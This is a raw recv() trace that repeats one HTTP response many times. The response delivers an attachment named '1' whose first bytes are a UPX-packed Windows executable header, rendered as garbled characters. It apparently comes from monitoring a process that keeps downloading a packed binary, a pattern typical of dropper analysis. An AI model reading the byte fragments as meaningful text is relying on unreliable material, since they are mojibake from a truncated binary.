 buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:46:48 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 812
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 accept-ranges: bytes last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:46:48 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 276
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:46:49 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 776
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:46:50 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 816
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:46:50 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 accept-ranges: bytes last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:46:51 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 812
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:46:52 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 800
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes date: Wed, 18 Oct 2023 00:46:54 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 800
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:46:54 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:46:55 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 820
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:46:56 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 816
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:46:57 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 812
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:46:57 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 800
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:46:58 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:01 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 824
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:02 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 800
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:05 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 828
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:11 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 832
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:12 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 812
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:47:13 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 776
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:14 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 800
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:47:14 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 812
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:47:16 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 836
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:16 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:47:17 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 812
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:47:17 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:47:18 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 828
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 accept-ranges: bytes last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:47:19 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 836
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" accept-ranges: bytes content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:47:19 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 824
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:47:20 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 800
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" content-type: application/octet-stream etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:21 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 accept-ranges: bytes last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:47:22 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 824
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:26 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 828
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:47:29 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 828
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:29 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 776
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:47:31 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 832
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:32 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 840
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:32 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 844
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:47:33 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 832
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:34 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 776
1 1024 0

recv

 buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:34 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 836
1 1024 0

recv

